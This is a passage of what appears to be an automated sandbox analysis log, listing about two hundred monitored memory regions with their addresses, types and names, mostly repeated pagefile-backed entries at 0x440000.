"pagefile_0x0000000000440000" filename = "" Region: id = 1630 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1631 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1632 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1633 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1634 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1635 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1636 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1637 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1638 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1639 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1640 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1641 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1642 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1643 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1644 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1645 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1646 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1647 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1648 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1649 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1650 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1651 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1652 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1653 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1654 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1655 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1656 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1657 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1658 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1659 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1660 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1661 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1662 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1663 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1664 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1665 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1666 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1667 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1668 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1669 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1670 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1671 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1672 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1673 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1674 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1675 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1676 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1677 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1678 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1679 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1680 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1681 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1682 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1683 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1684 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1685 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1686 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1687 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1688 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1689 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1690 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1691 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1692 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1693 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1694 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1695 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1696 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1697 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1698 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1699 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1700 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1701 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1702 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1703 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1704 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1705 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1706 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1707 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1708 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1709 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1710 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1711 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1712 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1713 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1714 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1715 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1716 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1717 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1718 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1719 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1720 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1721 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1722 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1723 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1724 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1725 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1726 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1727 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1728 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1729 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1730 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1731 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1732 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1733 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1734 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1735 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1736 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1737 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1738 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1739 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1740 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1741 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1742 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1743 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1744 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1745 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1746 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1747 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1748 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1749 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1750 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1751 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1752 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1753 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1754 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1755 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1756 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1757 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1758 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1759 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1760 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1761 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1762 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1763 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1764 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1765 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1766 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1767 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1768 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1769 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1770 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1771 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1772 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1773 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1774 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1775 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1776 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1777 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1778 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1779 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1780 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1781 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1782 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1783 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1784 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1785 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1786 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1787 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1788 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1789 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1790 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1791 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1792 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1793 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1794 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1795 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1796 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1797 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1798 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1799 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1800 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1801 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1802 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1803 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1804 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1805 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1806 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1807 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1808 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1809 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1810 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1811 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1812 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1813 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1814 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1815 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1816 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1817 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1818 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 1819 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" 